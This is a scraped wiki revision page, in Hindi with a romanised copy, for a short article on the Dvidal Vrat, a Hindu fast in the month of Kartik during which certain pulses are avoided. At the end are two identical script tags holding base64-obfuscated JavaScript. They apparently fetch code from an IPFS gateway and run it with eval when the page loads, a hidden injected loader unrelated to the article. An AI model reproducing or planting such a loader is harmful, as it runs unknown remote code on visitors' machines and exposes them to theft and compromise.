Difference between revisions of "द्विदल व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "हिन्दूओं" to "हिन्दुओं")
 
(6 intermediate revisions by 5 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
'''द्विदल व्रत''' [[हिन्दू|हिन्दुओं]] द्वारा रखे जाने वाले व्रतों में से एक है। [[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह [[हिन्दू धर्म]] के ग्रंथों में उल्लिखित हिन्दू धर्म का एक व्रत संस्कार है।
*यह व्रत [[कार्तिक]] में होता है।
+
 
*द्विदल धान्य, यथा—तूर, राजिका, माष, मुद्ग, मसूर, चना, कुलित्थ का वर्जन होता है।<ref>निर्णयसिन्धु (104-105)।</ref>  
+
*द्विदल व्रत [[कार्तिक]] में होता है।
 +
*द्विदल धान्य, यथा—तूर, राजिका, माष, मुद्ग, मसूर, [[चना]], कुलित्थ का वर्जन होता है।<ref>निर्णयसिन्धु (104-105)।</ref>  
  
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 11:17, 17 May 2013

dvidal vrat hinduoan dvara rakhe jane vale vratoan mean se ek hai. bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm ke granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.

  • dvidal vrat kartik mean hota hai.
  • dvidal dhany, yatha—toor, rajika, mash, mudg, masoor, chana, kulitth ka varjan hota hai.[1]

tika tippani aur sandarbh

  1. nirnayasindhu (104-105).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>